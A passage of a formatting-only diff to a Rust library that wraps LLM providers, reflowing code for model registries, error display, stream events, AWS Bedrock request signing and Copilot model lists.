@@ -118,10 +139,21 @@ impl ModelRegistry {
     fn add_openai_models(&mut self) {
         let pid = ProviderId::new(ProviderId::OPENAI);
         for (id, name, ctx, out, cost_in, cost_out, tools, reasoning) in [
-            ("gpt-4o",      "GPT-4o",        128_000u32, 16_384u32,  2.5f64, 10.0f64, true,  false),
-            ("gpt-4o-mini", "GPT-4o mini",   128_000,    16_384,     0.15,    0.6,    true,  false),
-            ("o3",          "o3",            200_000,   100_000,    10.0,   40.0,    true,  true),
-            ("o4-mini",     "o4-mini",       200_000,   100_000,     1.1,    4.4,    true,  true),
+            (
+                "gpt-4o", "GPT-4o", 128_000u32, 16_384u32, 2.5f64, 10.0f64, true, false,
+            ),
+            (
+                "gpt-4o-mini",
+                "GPT-4o mini",
+                128_000,
+                16_384,
+                0.15,
+                0.6,
+                true,
+                false,
+            ),
+            ("o3", "o3", 200_000, 100_000, 10.0, 40.0, true, true),
+            ("o4-mini", "o4-mini", 200_000, 100_000, 1.1, 4.4, true, true),
         ] {
             self.insert(ModelEntry {
                 info: ModelInfo {
@@ -147,9 +179,30 @@ impl ModelRegistry {
     fn add_google_models(&mut self) {
         let pid = ProviderId::new(ProviderId::GOOGLE);
         for (id, name, ctx, out, cost_in, cost_out) in [
-            ("gemini-2.5-pro",   "Gemini 2.5 Pro",   1_048_576u32, 65_536u32, 1.25f64, 5.0f64),
-            ("gemini-2.5-flash", "Gemini 2.5 Flash", 1_048_576,    65_536,    0.15,    0.6),
-            ("gemini-2.0-flash", "Gemini 2.0 Flash", 1_048_576,     8_192,    0.1,     0.4),
+            (
+                "gemini-2.5-pro",
+                "Gemini 2.5 Pro",
+                1_048_576u32,
+                65_536u32,
+                1.25f64,
+                5.0f64,
+            ),
+            (
+                "gemini-2.5-flash",
+                "Gemini 2.5 Flash",
+                1_048_576,
+                65_536,
+                0.15,
+                0.6,
+            ),
+            (
+                "gemini-2.0-flash",
+                "Gemini 2.0 Flash",
+                1_048_576,
+                8_192,
+                0.1,
+                0.4,
+            ),
         ] {
             self.insert(ModelEntry {
                 info: ModelInfo {
@@ -217,13 +270,20 @@ impl ModelRegistry {
         //    from hijacking well-known models like claude-* or gpt-*.
         let canonical = if model_name.starts_with("claude") {
             Some(ProviderId::ANTHROPIC)
-        } else if model_name.starts_with("gpt-") || model_name.starts_with("o1") || model_name.starts_with("o3") || model_name.starts_with("o4") {
+        } else if model_name.starts_with("gpt-")
+            || model_name.starts_with("o1")
+            || model_name.starts_with("o3")
+            || model_name.starts_with("o4")
+        {
             Some(ProviderId::OPENAI)
         } else if model_name.starts_with("gemini") || model_name.starts_with("gemma") {
             Some(ProviderId::GOOGLE)
         } else if model_name.starts_with("deepseek") {
             Some("deepseek")
-        } else if model_name.starts_with("mistral") || model_name.starts_with("codestral") || model_name.starts_with("pixtral") {
+        } else if model_name.starts_with("mistral")
+            || model_name.starts_with("codestral")
+            || model_name.starts_with("pixtral")
+        {
             Some("mistral")
         } else if model_name.starts_with("grok") {
             Some("xai")
@@ -249,8 +309,7 @@ impl ModelRegistry {
         // the canonical ID (e.g. "gemini-3-flash-preview" may be stored as
         // "gemini-3-flash-preview-05-20").  Try a prefix match.
         for entry in self.entries.values() {
-            if (&*entry.info.id).starts_with(model_name)
-                || model_name.starts_with(&*entry.info.id)
+            if (&*entry.info.id).starts_with(model_name) || model_name.starts_with(&*entry.info.id)
             {
                 return Some(entry.info.provider_id.clone());
             }
@@ -427,10 +486,7 @@ impl ModelRegistry {
         // { "provider_id": { "models": { "model_id": { "name": "...", "limit": {...}, "cost": {...} } } } }
         if let Some(obj) = json.as_object() {
             for (provider_id, provider_data) in obj {
-                if let Some(models) = provider_data
-                    .get("models")
-                    .and_then(|m| m.as_object())
-                {
+                if let Some(models) = provider_data.get("models").and_then(|m| m.as_object()) {
                     for (model_id, model_data) in models {
                         let ctx = model_data
                             .get("limit")
@@ -469,24 +525,27 @@ impl ModelRegistry {
                         let key = format!("{}/{}", pid, mid);
 
                         // models.dev is the source of truth — overwrite bundled snapshot data.
-                        self.entries.insert(key, ModelEntry {
-                            info: ModelInfo {
-                                id: mid,
-                                provider_id: pid,
-                                name,
-                                context_window: ctx,
-                                max_output_tokens: out,
+                        self.entries.insert(
+                            key,
+                            ModelEntry {
+                                info: ModelInfo {
+                                    id: mid,
+                                    provider_id: pid,
+                                    name,
+                                    context_window: ctx,
+                                    max_output_tokens: out,
+                                },
+                                cost_input: cost_in,
+                                cost_output: cost_out,
+                                cost_cache_read: None,
+                                cost_cache_write: None,
+                                tool_calling,
+                                reasoning,
+                                vision: false,
+                                family: None,
+                                status: "active".to_string(),
                             },
-                            cost_input: cost_in,
-                            cost_output: cost_out,
-                            cost_cache_read: None,
-                            cost_cache_write: None,
-                            tool_calling,
-                            reasoning,
-                            vision: false,
-                            family: None,
-                            status: "active".to_string(),
-                        });
+                        );
                     }
                 }
             }
@@ -530,9 +589,7 @@ impl ModelRegistry {
             }
         }
         // Fall back to our own serialized format.
-        if let Ok(entries) =
-            serde_json::from_str::<HashMap<String, ModelEntry>>(&data)
-        {
+        if let Ok(entries) = serde_json::from_str::<HashMap<String, ModelEntry>>(&data) {
             self.entries.extend(entries);
         }
     }

--- a/src-rust/crates/api/src/provider.rs
+++ b/src-rust/crates/api/src/provider.rs
@@ -11,7 +11,9 @@ use serde::{Deserialize, Serialize};
 use std::pin::Pin;
 
 use crate::provider_error::ProviderError;
-use crate::provider_types::{ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StreamEvent};
+use crate::provider_types::{
+    ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StreamEvent,
+};
 
 // ---------------------------------------------------------------------------
 // ModelInfo
@@ -63,10 +65,7 @@ pub trait LlmProvider: Send + Sync {
     async fn create_message_stream(
         &self,
         request: ProviderRequest,
-    ) -> Result<
-        Pin<Box<dyn Stream<Item = Result<StreamEvent, ProviderError>> + Send>>,
-        ProviderError,
-    >;
+    ) -> Result<Pin<Box<dyn Stream<Item = Result<StreamEvent, ProviderError>> + Send>>, ProviderError>;
 
     /// Return the list of models available through this provider.
     ///

--- a/src-rust/crates/api/src/provider_error.rs
+++ b/src-rust/crates/api/src/provider_error.rs
@@ -130,14 +130,21 @@ impl ProviderError {
 impl fmt::Display for ProviderError {
     fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
         match self {
-            ProviderError::ContextOverflow { provider, message, max_tokens } => {
+            ProviderError::ContextOverflow {
+                provider,
+                message,
+                max_tokens,
+            } => {
                 write!(f, "[{}] Context overflow: {}", provider, message)?;
                 if let Some(max) = max_tokens {
                     write!(f, " (max {} tokens)", max)?;
                 }
                 Ok(())
             }
-            ProviderError::RateLimited { provider, retry_after } => {
+            ProviderError::RateLimited {
+                provider,
+                retry_after,
+            } => {
                 write!(f, "[{}] Rate limited", provider)?;
                 if let Some(secs) = retry_after {
                     write!(f, "; retry after {}s", secs)?;
@@ -150,34 +157,46 @@ impl fmt::Display for ProviderError {
             ProviderError::QuotaExceeded { provider, message } => {
                 write!(f, "[{}] Quota exceeded: {}", provider, message)
             }
-            ProviderError::ModelNotFound { provider, model, suggestions } => {
+            ProviderError::ModelNotFound {
+                provider,
+                model,
+                suggestions,
+            } => {
                 write!(f, "[{}] Model not found: {}", provider, model)?;
                 if !suggestions.is_empty() {
                     write!(f, " (suggestions: {})", suggestions.join(", "))?;
                 }
                 Ok(())
             }
-            ProviderError::ServerError { provider, status, message, .. } => {
-                match status {
-                    Some(s) => write!(f, "[{}] Server error {}: {}", provider, s, message),
-                    None => write!(f, "[{}] Server error: {}", provider, message),
-                }
-            }
+            ProviderError::ServerError {
+                provider,
+                status,
+                message,
+                ..
+            } => match status {
+                Some(s) => write!(f, "[{}] Server error {}: {}", provider, s, message),
+                None => write!(f, "[{}] Server error: {}", provider, message),
+            },
             ProviderError::InvalidRequest { provider, message } => {
                 write!(f, "[{}] Invalid request: {}", provider, message)
             }
             ProviderError::ContentFiltered { provider, message } => {
                 write!(f, "[{}] Content filtered: {}", provider, message)
             }
-            ProviderError::StreamError { provider, message, .. } => {
+            ProviderError::StreamError {
+                provider, message, ..
+            } => {
                 write!(f, "[{}] Stream error: {}", provider, message)
             }
-            ProviderError::Other { provider, message, status, .. } => {
-                match status {
-                    Some(s) => write!(f, "[{}] Error {}: {}", provider, s, message),
-                    None => write!(f, "[{}] Error: {}", provider, message),
-                }
-            }
+            ProviderError::Other {
+                provider,
+                message,
+                status,
+                ..
+            } => match status {
+                Some(s) => write!(f, "[{}] Error {}: {}", provider, s, message),
+                None => write!(f, "[{}] Error: {}", provider, message),
+            },
         }
     }
 }
@@ -198,12 +217,14 @@ impl From<ProviderError> for ClaudeError {
             ProviderError::ContextOverflow { .. } => ClaudeError::ContextWindowExceeded,
             ProviderError::RateLimited { .. } => ClaudeError::RateLimit,
             ProviderError::AuthFailed { message, .. } => ClaudeError::Auth(message.clone()),
-            ProviderError::ServerError { status: Some(s), message, .. } => {
-                ClaudeError::ApiStatus {
-                    status: *s,
-                    message: message.clone(),
-                }
-            }
+            ProviderError::ServerError {
+                status: Some(s),
+                message,
+                ..
+            } => ClaudeError::ApiStatus {
+                status: *s,
+                message: message.clone(),
+            },
             _ => ClaudeError::Api(err.to_string()),
         }
     }

--- a/src-rust/crates/api/src/provider_types.rs
+++ b/src-rust/crates/api/src/provider_types.rs
@@ -10,7 +10,7 @@ use serde_json::Value;
 
 // Re-export ThinkingConfig and SystemPrompt from the api types module so
 // callers only need to import from this module.
-pub use crate::types::{ThinkingConfig, SystemPrompt};
+pub use crate::types::{SystemPrompt, ThinkingConfig};
 
 // ---------------------------------------------------------------------------
 // StopReason
@@ -140,33 +140,19 @@ pub enum StreamEvent {
     },
 
     /// Incremental text delta for an in-progress block.
-    TextDelta {
-        index: usize,
-        text: String,
-    },
+    TextDelta { index: usize, text: String },
 
     /// Incremental thinking / reasoning delta.
-    ThinkingDelta {
-        index: usize,
-        thinking: String,
-    },
+    ThinkingDelta { index: usize, thinking: String },
 
     /// Incremental delta for tool-call JSON arguments.
-    InputJsonDelta {
-        index: usize,
-        partial_json: String,
-    },
+    InputJsonDelta { index: usize, partial_json: String },
 
     /// Incremental delta for a cryptographic signature block.
-    SignatureDelta {
-        index: usize,
-        signature: String,
-    },
+    SignatureDelta { index: usize, signature: String },
 
     /// An in-progress content block is now complete.
-    ContentBlockStop {
-        index: usize,
-    },
+    ContentBlockStop { index: usize },
 
     /// Final message-level delta carrying the stop reason and updated usage.
     MessageDelta {
@@ -178,16 +164,10 @@ pub enum StreamEvent {
     MessageStop,
 
     /// A provider-level error occurred mid-stream.
-    Error {
-        error_type: String,
-        message: String,
-    },
+    Error { error_type: String, message: String },
 
     /// Incremental reasoning / scratchpad delta (alias used by some providers).
-    ReasoningDelta {
-        index: usize,
-        reasoning: String,
-    },
+    ReasoningDelta { index: usize, reasoning: String },
 }
 
 // ---------------------------------------------------------------------------
@@ -265,15 +245,10 @@ pub enum ProviderStatus {
 #[serde(rename_all = "snake_case", tag = "type")]
 pub enum AuthMethod {
     /// A static API key sent as an HTTP header.
-    ApiKey {
-        key: String,
-        header: ApiKeyHeader,
-    },
+    ApiKey { key: String, header: ApiKeyHeader },
 
     /// A bearer token sent in the `Authorization` header.
-    Bearer {
-        token: String,
-    },
+    Bearer { token: String },
 
     /// AWS Signature V4 credentials for Amazon Bedrock.
     AwsCredentials {

--- a/src-rust/crates/api/src/providers/anthropic.rs
+++ b/src-rust/crates/api/src/providers/anthropic.rs
@@ -59,10 +59,8 @@ impl AnthropicProvider {
     /// Build a [`CreateMessageRequest`] from a [`ProviderRequest`].
     fn build_request(request: &ProviderRequest) -> CreateMessageRequest {
         let normalized_messages = normalize_anthropic_messages(&request.messages);
-        let api_messages: Vec<ApiMessage> = normalized_messages
-            .iter()
-            .map(ApiMessage::from)
-            .collect();
+        let api_messages: Vec<ApiMessage> =
+            normalized_messages.iter().map(ApiMessage::from).collect();
 
         let api_tools: Option<Vec<ApiToolDefinition>> = if request.tools.is_empty() {
             None
@@ -117,13 +115,15 @@ impl AnthropicProvider {
             AnthropicStreamEvent::MessageStart { id, model, usage } => {
                 Some(StreamEvent::MessageStart { id, model, usage })
             }
-            AnthropicStreamEvent::ContentBlockStart { index, content_block } => {
-                Some(StreamEvent::ContentBlockStart { index, content_block })
-            }
+            AnthropicStreamEvent::ContentBlockStart {
+                index,
+                content_block,
+            } => Some(StreamEvent::ContentBlockStart {
+                index,
+                content_block,
+            }),
             AnthropicStreamEvent::ContentBlockDelta { index, delta } => match delta {
-                ContentDelta::TextDelta { text } => {
-                    Some(StreamEvent::TextDelta { index, text })
-                }
+                ContentDelta::TextDelta { text } => Some(StreamEvent::TextDelta { index, text }),
                 ContentDelta::ThinkingDelta { thinking } => {
                     Some(StreamEvent::ThinkingDelta { index, thinking })
                 }
@@ -131,7 +131,10 @@ impl AnthropicProvider {
                     Some(StreamEvent::SignatureDelta { index, signature })
                 }
                 ContentDelta::InputJsonDelta { partial_json } => {
-                    Some(StreamEvent::InputJsonDelta { index, partial_json })
+                    Some(StreamEvent::InputJsonDelta {
+                        index,
+                        partial_json,
+                    })
                 }
             },
             AnthropicStreamEvent::ContentBlockStop { index } => {
@@ -145,9 +148,13 @@ impl AnthropicProvider {
                 })
             }
             AnthropicStreamEvent::MessageStop => Some(StreamEvent::MessageStop),
-            AnthropicStreamEvent::Error { error_type, message } => {
-                Some(StreamEvent::Error { error_type, message })
-            }
+            AnthropicStreamEvent::Error {
+                error_type,
+                message,
+            } => Some(StreamEvent::Error {
+                error_type,
+                message,
+            }),
             AnthropicStreamEvent::Ping => None,
         }
     }
@@ -255,7 +262,10 @@ impl LlmProvider for AnthropicProvider {
                         }
                     }
                     StreamEvent::MessageStop => break,
-                    StreamEvent::Error { error_type, message } => {
+                    StreamEvent::Error {
+                        error_type,
+                        message,
+                    } => {
                         return Err(ProviderError::StreamError {
                             provider: self.id.clone(),
                             message: format!("[{}] {}", error_type, message),

--- a/src-rust/crates/api/src/providers/azure.rs
+++ b/src-rust/crates/api/src/providers/azure.rs
@@ -64,8 +64,8 @@ impl AzureProvider {
     pub fn from_env() -> Option<Self> {
         let key = std::env::var("AZURE_API_KEY").ok()?;
         let resource = std::env::var("AZURE_RESOURCE_NAME").ok()?;
-        let version = std::env::var("AZURE_API_VERSION")
-            .unwrap_or_else(|_| "2024-08-01-preview".to_string());
+        let version =
+            std::env::var("AZURE_API_VERSION").unwrap_or_else(|_| "2024-08-01-preview".to_string());
         Some(Self::new(resource, key).with_api_version(version))
     }
 

--- a/src-rust/crates/api/src/providers/bedrock.rs
+++ b/src-rust/crates/api/src/providers/bedrock.rs
@@ -157,7 +157,11 @@ impl BedrockProvider {
         });
         let canonical_uri = {
             let p = parsed.path();
-            if p.is_empty() { "/".to_string() } else { p.to_string() }
+            if p.is_empty() {
+                "/".to_string()
+            } else {
+                p.to_string()
+            }
         };
         let canonical_query = parsed.query().unwrap_or("").to_string();
 
@@ -175,8 +179,7 @@ impl BedrockProvider {
             "content-type:{}\nhost:{}\nx-amz-content-sha256:{}\nx-amz-date:{}\n",
             content_type, host, body_hash, datetime_str
         );
-        let mut signed_headers =
-            "content-type;host;x-amz-content-sha256;x-amz-date".to_string();
+        let mut signed_headers = "content-type;host;x-amz-content-sha256;x-amz-date".to_string();
 
         if let Some(ref tok) = self.session_token {
             canonical_headers.push_str(&format!("x-amz-security-token:{}\n", tok));
@@ -186,19 +189,12 @@ impl BedrockProvider {
         // Canonical request.
         let canonical_request = format!(
             "{}\n{}\n{}\n{}\n{}\n{}",
-            method,
-            canonical_uri,
-            canonical_query,
-            canonical_headers,
-            signed_headers,
-            body_hash
+            method, canonical_uri, canonical_query, canonical_headers, signed_headers, body_hash
         );
 
         // String to sign.
-        let credential_scope =
-            format!("{}/{}/{}/aws4_request", date_str, region, service);
-        let canonical_request_hash =
-            hex::encode(Sha256::digest(canonical_request.as_bytes()));
+        let credential_scope = format!("{}/{}/{}/aws4_request", date_str, region, service);
+        let canonical_request_hash = hex::encode(Sha256::digest(canonical_request.as_bytes()));
         let string_to_sign = format!(
             "AWS4-HMAC-SHA256\n{}\n{}\n{}",
             datetime_str, credential_scope, canonical_request_hash
@@ -207,28 +203,23 @@ impl BedrockProvider {
         // Signing key: HMAC-SHA256 chain.
         let sign_key = {
             let k_date = {
-                let mut mac = HmacSha256::new_from_slice(
-                    format!("AWS4{}", secret_key).as_bytes(),
-                )
-                .expect("HMAC init failed");
+                let mut mac = HmacSha256::new_from_slice(format!("AWS4{}", secret_key).as_bytes())
+                    .expect("HMAC init failed");
                 mac.update(date_str.as_bytes());
                 mac.finalize().into_bytes()
             };
             let k_region = {
-                let mut mac = HmacSha256::new_from_slice(&k_date)
-                    .expect("HMAC init failed");
+                let mut mac = HmacSha256::new_from_slice(&k_date).expect("HMAC init failed");
                 mac.update(region.as_bytes());
                 mac.finalize().into_bytes()
             };
             let k_service = {
-                let mut mac = HmacSha256::new_from_slice(&k_region)
-                    .expect("HMAC init failed");
+                let mut mac = HmacSha256::new_from_slice(&k_region).expect("HMAC init failed");
                 mac.update(service.as_bytes());
                 mac.finalize().into_bytes()
             };
             let k_signing = {
-                let mut mac = HmacSha256::new_from_slice(&k_service)
-                    .expect("HMAC init failed");
+                let mut mac = HmacSha256::new_from_slice(&k_service).expect("HMAC init failed");
                 mac.update(b"aws4_request");
                 mac.finalize().into_bytes()
             };
@@ -236,8 +227,7 @@ impl BedrockProvider {
         };
 
         let signature = {
-            let mut mac =
-                HmacSha256::new_from_slice(&sign_key).expect("HMAC init failed");
+            let mut mac = HmacSha256::new_from_slice(&sign_key).expect("HMAC init failed");
             mac.update(string_to_sign.as_bytes());
             hex::encode(mac.finalize().into_bytes())
         };
@@ -540,9 +530,8 @@ impl BedrockProvider {
                 body: None,
             })?;
 
-        let content_blocks = Self::parse_converse_content(
-            message.get("content").and_then(|c| c.as_array()),
-        );
+        let content_blocks =
+            Self::parse_converse_content(message.get("content").and_then(|c| c.as_array()));
 
         let stop_reason_str = json
             .get("stopReason")
@@ -615,14 +604,8 @@ impl BedrockProvider {
             None => return UsageInfo::default(),
         };
         UsageInfo {
-            input_tokens: u
-                .get("inputTokens")
-                .and_then(|v| v.as_u64())
-                .unwrap_or(0),
-            output_tokens: u
-                .get("outputTokens")
-                .and_then(|v| v.as_u64())
-                .unwrap_or(0),
+            input_tokens: u.get("inputTokens").and_then(|v| v.as_u64()).unwrap_or(0),
+            output_tokens: u.get("outputTokens").and_then(|v| v.as_u64()).unwrap_or(0),
             cache_creation_input_tokens: 0,
             cache_read_input_tokens: 0,
         }
@@ -906,7 +889,9 @@ fn parse_bedrock_event(
         } else {
             events.push(Ok(StreamEvent::ContentBlockStart {
                 index,
-                content_block: ContentBlock::Text { text: String::new() },
+                content_block: ContentBlock::Text {
+                    text: String::new(),
+                },
             }));
         }
         return events;
@@ -926,7 +911,9 @@ fn parse_bedrock_event(
             }));
             events.push(Ok(StreamEvent::ContentBlockStart {
                 index: 0,
-                content_block: ContentBlock::Text { text: String::new() },
+                content_block: ContentBlock::Text {
+                    text: String::new(),
+                },
             }));
             *message_started = true;
         }

--- a/src-rust/crates/api/src/providers/cohere.rs
+++ b/src-rust/crates/api/src/providers/cohere.rs
@@ -70,10 +70,7 @@ impl CohereProvider {
     /// Cohere v2 uses the same shape as OpenAI Chat Completions, so we reuse
     /// the OpenAI transformation helper.
     fn build_messages(&self, request: &ProviderRequest) -> Vec<Value> {
-        OpenAiProvider::to_openai_messages_pub(
-            &request.messages,
-            request.system_prompt.as_ref(),
-        )
+        OpenAiProvider::to_openai_messages_pub(&request.messages, request.system_prompt.as_ref())
     }
 
     /// Build the Cohere v2 tools array.  Same shape as OpenAI function tools.
@@ -86,7 +83,11 @@ impl CohereProvider {
         // Cohere error format: {"message": "..."}
         let message = serde_json::from_str::<Value>(body)
             .ok()
-            .and_then(|v| v.get("message").and_then(|m| m.as_str()).map(|s| s.to_string()))
+            .and_then(|v| {
+                v.get("message")
+                    .and_then(|m| m.as_str())
+                    .map(|s| s.to_string())
+            })
             .unwrap_or_else(|| body.to_string());
 
         match status {
@@ -207,7 +208,9 @@ impl CohereProvider {
                 for item in content_arr {
                     if item.get("type").and_then(|t| t.as_str()) == Some("text") {
                         if let Some(text) = item.get("text").and_then(|t| t.as_str()) {
-                            content_blocks.push(ContentBlock::Text { text: text.to_string() });
+                            content_blocks.push(ContentBlock::Text {
+                                text: text.to_string(),
+                            });
                         }
                     }
                 }
@@ -216,7 +219,11 @@ impl CohereProvider {
             // Tool calls
             if let Some(tool_calls) = message.get("tool_calls").and_then(|t| t.as_array()) {
                 for tc in tool_calls {
-                    let id = tc.get("id").and_then(|v| v.as_str()).unwrap_or("").to_string();
+                    let id = tc
+                        .get("id")
+                        .and_then(|v| v.as_str())
+                        .unwrap_or("")
+                        .to_string();
                     let name = tc
                         .get("function")
                         .and_then(|f| f.get("name"))
@@ -236,7 +243,9 @@ impl CohereProvider {
         }
 
         if content_blocks.is_empty() {
-            content_blocks.push(ContentBlock::Text { text: String::new() });
+            content_blocks.push(ContentBlock::Text {
+                text: String::new(),
+            });
         }
 
         Ok(ProviderResponse {
@@ -316,9 +325,7 @@ fn map_finish_reason(reason: &str) -> StopReason {
         "MAX_TOKENS" => StopReason::MaxTokens,
         "STOP_SEQUENCE" => StopReason::StopSequence,
         "TOOL_CALL" => StopReason::ToolUse,
-        "ERROR" | "ERROR_TOXIC" | "USER_CANCEL" => {
-            StopReason::Other(reason.to_string())
-        }
+        "ERROR" | "ERROR_TOXIC" | "USER_CANCEL" => StopReason::Other(reason.to_string()),
         other => StopReason::Other(other.to_string()),
     }
 }

--- a/src-rust/crates/api/src/providers/copilot.rs
+++ b/src-rust/crates/api/src/providers/copilot.rs
@@ -23,7 +23,9 @@ use std::pin::Pin;
 use async_stream::stream;
 use async_trait::async_trait;
 use claurst_core::provider_id::{ModelId, ProviderId};
-use claurst_core::types::{ContentBlock, ImageSource, MessageContent, Role, ToolResultContent, UsageInfo};
+use claurst_core::types::{
+    ContentBlock, ImageSource, MessageContent, Role, ToolResultContent, UsageInfo,
+};
 use futures::Stream;
 use serde_json::{json, Value};
 use tracing::debug;
@@ -33,8 +35,7 @@ use crate::provider::{LlmProvider, ModelInfo};
 use crate::provider_error::ProviderError;
 use crate::provider_types::{
     ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason,
-    StreamEvent,
-    SystemPromptStyle,
+    StreamEvent, SystemPromptStyle,
 };
 use crate::providers::openai::OpenAiProvider;
 
@@ -195,7 +196,10 @@ impl CopilotProvider {
         };
 
         let major: String = rest.chars().take_while(|c| c.is_ascii_digit()).collect();
-        major.parse::<u32>().map(|value| value >= 5).unwrap_or(false)
+        major
+            .parse::<u32>()
+            .map(|value| value >= 5)
+            .unwrap_or(false)
     }
 
     /// Check whether a provider error indicates the model/endpoint is
@@ -205,7 +209,10 @@ impl CopilotProvider {
             err,
             ProviderError::InvalidRequest { .. }
                 | ProviderError::ModelNotFound { .. }
-                | ProviderError::Other { status: Some(400..=499), .. }
+                | ProviderError::Other {
+                    status: Some(400..=499),
+                    ..
+                }
         )
     }
 
@@ -309,14 +316,15 @@ impl CopilotProvider {
                 MessageContent::Blocks(blocks) => match &message.role {
                     Role::User => {
                         let mut message_parts = Vec::new();
-                        let flush_user_content = |input: &mut Vec<Value>, content: &mut Vec<Value>| {
-                            if !content.is_empty() {
-                                input.push(json!({
-                                    "role": "user",
-                                    "content": std::mem::take(content),
-                                }));
-                            }
-                        };
+                        let flush_user_content =
+                            |input: &mut Vec<Value>, content: &mut Vec<Value>| {
+                                if !content.is_empty() {
+                                    input.push(json!({
+                                        "role": "user",
+                                        "content": std::mem::take(content),
+                                    }));
+                                }
+                            };
                         for (index, block) in blocks.iter().enumerate() {
                             if let Some(part) = Self::user_block_to_responses_part(block, index) {
                                 message_parts.push(part);
@@ -441,17 +449,83 @@ impl CopilotProvider {
     /// unreachable or returns empty data.
     fn hardcoded_models(provider_id: &ProviderId) -> Vec<ModelInfo> {
         vec![
-            ModelInfo { id: ModelId::new("claude-sonnet-4.6"), provider_id: provider_id.clone(), name: "Claude Sonnet 4.6 (Copilot)".into(), context_window: 128_000, max_output_tokens: 32_000 },
-            ModelInfo { id: ModelId::new("claude-sonnet-4.5"), provider_id: provider_id.clone(), name: "Claude Sonnet 4.5 (Copilot)".into(), context_window: 128_000, max_output_tokens: 32_000 },
-            ModelInfo { id: ModelId::new("claude-haiku-4.5"), provider_id: provider_id.clone(), name: "Claude Haiku 4.5 (Copilot)".into(), context_window: 128_000, max_output_tokens: 32_000 },
-            ModelInfo { id: ModelId::new("gpt-4.1"), provider_id: provider_id.clone(), name: "GPT-4.1 (Copilot)".into(), context_window: 64_000, max_output_tokens: 16_384 },
-            ModelInfo { id: ModelId::new("gpt-4o"), provider_id: provider_id.clone(), name: "GPT-4o (Copilot)".into(), context_window: 128_000, max_output_tokens: 16_384 },
-            ModelInfo { id: ModelId::new("gpt-4o-mini"), provider_id: provider_id.clone(), name: "GPT-4o Mini (Copilot)".into(), context_window: 128_000, max_output_tokens: 16_384 },
-            ModelInfo { id: ModelId::new("gpt-5.4"), provider_id: provider_id.clone(), name: "GPT-5.4 (Copilot)".into(), context_window: 128_000, max_output_tokens: 128_000 },
-            ModelInfo { id: ModelId::new("gpt-5-mini"), provider_id: provider_id.clone(), name: "GPT-5 Mini (Copilot)".into(), context_window: 128_000, max_output_tokens: 128_000 },
-            ModelInfo { id: ModelId::new("o3-mini"), provider_id: provider_id.clone(), name: "o3-mini (Copilot)".into(), context_window: 200_000, max_output_tokens: 100_000 },
-            ModelInfo { id: ModelId::new("o4-mini"), provider_id: provider_id.clone(), name: "o4-mini (Copilot)".into(), context_window: 200_000, max_output_tokens: 100_000 },
-            ModelInfo { id: ModelId::new("gemini-3-flash-preview"), provider_id: provider_id.clone(), name: "Gemini 3 Flash (Copilot)".into(), context_window: 128_000, max_output_tokens: 64_000 },
+            ModelInfo {
+                id: ModelId::new("claude-sonnet-4.6"),
+                provider_id: provider_id.clone(),
+                name: "Claude Sonnet 4.6 (Copilot)".into(),
+                context_window: 128_000,
+                max_output_tokens: 32_000,
+            },
+            ModelInfo {
+                id: ModelId::new("claude-sonnet-4.5"),
+                provider_id: provider_id.clone(),
+                name: "Claude Sonnet 4.5 (Copilot)".into(),
+                context_window: 128_000,
+                max_output_tokens: 32_000,
+            },
+            ModelInfo {
+                id: ModelId::new("claude-haiku-4.5"),
+                provider_id: provider_id.clone(),
+                name: "Claude Haiku 4.5 (Copilot)".into(),
+                context_window: 128_000,
+                max_output_tokens: 32_000,
+            },
+            ModelInfo {
+                id: ModelId::new("gpt-4.1"),
+                provider_id: provider_id.clone(),
+                name: "GPT-4.1 (Copilot)".into(),
+                context_window: 64_000,
+                max_output_tokens: 16_384,
+            },
+            ModelInfo {
+                id: ModelId::new("gpt-4o"),
+                provider_id: provider_id.clone(),
+                name: "GPT-4o (Copilot)".into(),
+                context_window: 128_000,
+                max_output_tokens: 16_384,
+            },
+            ModelInfo {
+                id: ModelId::new("gpt-4o-mini"),
+                provider_id: provider_id.clone(),
+                name: "GPT-4o Mini (Copilot)".into(),
+                context_window: 128_000,
+                max_output_tokens: 16_384,
+            },
+            ModelInfo {
+                id: ModelId::new("gpt-5.4"),
+                provider_id: provider_id.clone(),
+                name: "GPT-5.4 (Copilot)".into(),
+                context_window: 128_000,
+                max_output_tokens: 128_000,
+            },
+            ModelInfo {
+                id: ModelId::new("gpt-5-mini"),
+                provider_id: provider_id.clone(),
+                name: "GPT-5 Mini (Copilot)".into(),
+                context_window: 128_000,
+                max_output_tokens: 128_000,
+            },
+            ModelInfo {
+                id: ModelId::new("o3-mini"),
+                provider_id: provider_id.clone(),
+                name: "o3-mini (Copilot)".into(),
+                context_window: 200_000,
+                max_output_tokens: 100_000,
+            },
+            ModelInfo {
+                id: ModelId::new("o4-mini"),
+                provider_id: provider_id.clone(),
+                name: "o4-mini (Copilot)".into(),
+                context_window: 200_000,
+                max_output_tokens: 100_000,
+            },
+            ModelInfo {
+                id: ModelId::new("gemini-3-flash-preview"),
+                provider_id: provider_id.clone(),
+                name: "Gemini 3 Flash (Copilot)".into(),
+                context_window: 128_000,
+                max_output_tokens: 64_000,
+            },
         ]
     }
 
@@ -489,7 +563,9 @@ impl CopilotProvider {
                         for part in parts {
                             match part.get("type").and_then(|value| value.as_str()) {
                                 Some("output_text") | Some("text") => {
-                                    if let Some(text) = part.get("text").and_then(|value| value.as_str()) {
+                                    if let Some(text) =
+                                        part.get("text").and_then(|value| value.as_str())
+                                    {
                                         if !text.is_empty() {
                                             content.push(ContentBlock::Text {
                                                 text: text.to_string(),
@@ -1107,7 +1183,8 @@ impl LlmProvider for CopilotProvider {
         // Try to fetch the live model list from the Copilot API.
         let url = format!("{}/models", Self::base_url());
         let builder = self.http_client.get(&url);
-        let builder = self.copilot_headers(builder)
+        let builder = self
+            .copilot_headers(builder)
             .header("Accept", "application/json");
 
         let resp = builder.send().await;
@@ -1120,12 +1197,13 @@ impl LlmProvider for CopilotProvider {
                     status: None,
                     body: None,
                 })?;
-                let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other {
-                    provider: self.id.clone(),
-                    message: format!("Failed to parse models JSON: {}", e),
-                    status: None,
-                    body: Some(text.clone()),
-                })?;
+                let json: Value =
+                    serde_json::from_str(&text).map_err(|e| ProviderError::Other {
+                        provider: self.id.clone(),
+                        message: format!("Failed to parse models JSON: {}", e),
+                        status: None,
+                        body: Some(text.clone()),
+                    })?;
 
                 let mut models = Vec::new();
 
@@ -1138,10 +1216,7 @@ impl LlmProvider for CopilotProvider {
